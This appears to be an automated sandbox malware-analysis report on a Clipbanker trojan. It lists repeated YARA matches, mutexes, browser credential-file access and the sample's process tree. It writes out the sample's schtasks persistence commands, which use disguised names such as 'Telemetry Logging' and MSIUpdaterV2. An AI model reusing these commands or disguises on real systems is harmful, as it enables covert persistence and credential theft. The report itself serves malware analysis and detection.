Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 26.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001C.00000002.2550324003.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001C.00000002.2550324003.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000016.00000002.2249704079.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000016.00000002.2249704079.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000E.00000002.4443460598.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.4443460598.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000007.00000002.2188753837.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000007.00000002.2188753837.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000019.00000002.2385333464.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000019.00000002.2385333464.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000015.00000002.2242821853.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000015.00000002.2242821853.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000008.00000002.2208828961.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000008.00000002.2208828961.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001D.00000002.2631140407.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001D.00000002.2631140407.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001A.00000002.2465095851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001A.00000002.2465095851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2250105459.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000017.00000002.2250105459.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000B.00000002.2205175531.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.2205175531.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000018.00000002.2305505558.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000018.00000002.2305505558.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@36/36@3/5

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:728:120:WilError_03
Source: C:\Users\user\Desktop\file.exe	Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\trixy_lgbWpHb9dJ2

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.4443546402.0000000000A1A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.4443546402.0000000000A1A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000003.2070235991.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069275480.00000000064E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2059248318.00000000064CF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073144947.00000000064CF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2069937855.00000000060E3000.00000004.00000020.00020000.00000000.sdmp, HXF2GKJggz_xLogin Data.0.dr, ogxbFEXNUkQ0Login Data.0.dr, mX4bSXvGCffaLogin Data For Account.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe	ReversingLabs: Detection: 28%
Source: file.exe	Virustotal: Detection: 22%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe "C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe"
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
